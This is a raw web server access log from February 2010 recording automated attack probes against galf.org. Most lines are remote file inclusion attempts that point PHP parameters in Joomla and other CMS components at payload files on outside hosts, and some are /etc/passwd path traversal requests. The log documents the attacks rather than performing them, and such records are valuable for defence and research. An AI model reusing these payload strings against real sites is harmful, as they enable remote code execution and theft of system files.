222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/access_090928.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/access_091102.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/access.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/access_090824.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:06:53 -0800] "GET /logs/access_091123.log%20%20/joomla/index.php?option=com_restaurante&task=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:06:55 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:06:55 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:06:55 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:07:09 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:07:30 -0800] "GET /logs/access_100215.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:07:30 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:07:30 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:07:30 -0800] "GET /logs/access_100125.log//modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:07:35 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:07:39 -0800] "GET /logs/access_100118.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:07:42 -0800] "GET /modules/xfsection/modify.php?dir_module=http://dongja.booktobi.com//bbs/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:08:11 -0800] "GET /logs/access_100104.log//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:08:43 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:09:31 -0800] "GET /logs/access_100104.log//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:09:59 -0800] "GET /senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:09:59 -0800] "GET /logs/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:09:59 -0800] "GET /logs/access_091228.log%20%20/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:10:03 -0800] "GET /senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:10:03 -0800] "GET /logs/access_091228.log%20%20/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:10:03 -0800] "GET /logs/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:10:05 -0800] "GET /logs/access_091221.log//?_SERVER[DOCUMENT_ROOT]=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:10:33 -0800] "GET /logs/access_090803.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:10:33 -0800] "GET /logs/access_090831.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:11:00 -0800] "GET /logs/access_090803.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:11:00 -0800] "GET /logs/access_090831.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:11:35 -0800] "GET /logs/access_091207.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:11:36 -0800] "GET /logs/access_091109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:11:37 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:11:37 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:38 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:39 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:39 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:11:44 -0800] "GET /senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:11:44 -0800] "GET /logs/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:11:44 -0800] "GET /logs/access_091228.log%20%20/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:46 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:46 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:11:46 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [28/Feb/2010:22:11:51 -0800] "GET /logs/access_100111.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.35.138 - - [28/Feb/2010:22:11:51 -0800] "GET /logs/access_091207.log//include/lib.inc.php?site_path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:12:00 -0800] "GET /?mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:12:00 -0800] "GET /logs/?mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 200 4799 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:12:12 -0800] "GET /logs/access_090803.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:12:12 -0800] "GET /logs/access_090831.log/senetman/html/index.php?page=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:13:21 -0800] "GET /playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:13:21 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
165.132.30.11 - - [28/Feb/2010:22:13:21 -0800] "GET /logs/access_100222.log%20%20/playing.php/common/db.php?commonpath=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:47 -0800] "GET /convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:47 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:47 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:52 -0800] "GET /convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:52 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:16:52 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:17:22 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:17:29 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:17:46 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
193.111.95.42 - - [28/Feb/2010:22:17:46 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.moterostrailmadrid.es/blocks/ts????? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
67.195.114.35 - - [28/Feb/2010:22:19:35 -0800] "GET /logs/access.log HTTP/1.0" 200 288020 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:19:58 -0800] "GET /logs/access_091116.log%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:19:58 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:19:58 -0800] "GET /logs/access_091116.log%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:19:58 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:20:03 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:20:03 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:51 -0800] "GET /convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:51 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:52 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:53 -0800] "GET /convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:53 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:20:53 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:21:00 -0800] "GET /convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:21:00 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:21:00 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:21:17 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:21:17 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:21:17 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:22:03 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:22:04 -0800] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [28/Feb/2010:22:22:14 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:15 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:15 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:15 -0800] "GET /convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:25 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:25 -0800] "GET /convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:22:25 -0800] "GET /logs/access_091123.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:23:04 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:23:13 -0800] "GET /index.php?rage=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
194.24.174.51 - - [28/Feb/2010:22:23:13 -0800] "GET /index.php?rage=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:23:13 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:24 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:24 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:24 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:28 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:28 -0800] "GET /logs/access_100215.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:28 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:49 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
219.94.194.248 - - [28/Feb/2010:22:24:52 -0800] "GET /logs/access_100118.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.anydiy.net/diy/img/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:06 -0800] "GET /logs/access_100111.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:06 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:06 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:25:08 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:25:11 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.122.197.10 - - [28/Feb/2010:22:25:19 -0800] "GET /logs/access_100208.log%20%20/convert/mvcw.php?vwar_root=http://in2pool.com//Smileys/classic/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:25:29 -0800] "GET /logs/access_100208.log/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:33 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:33 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:25:33 -0800] "GET /logs/access_100111.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:25:33 -0800] "GET /logs/access_091123.log/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:25:39 -0800] "GET /logs/access_100208.log/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.233.162.101 - - [28/Feb/2010:22:25:43 -0800] "GET /logs/access_091123.log/convert/mvcw.php?vwar_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:26:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
116.127.121.117 - - [28/Feb/2010:22:26:26 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.formationalliance.com/images/id1.txt????????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
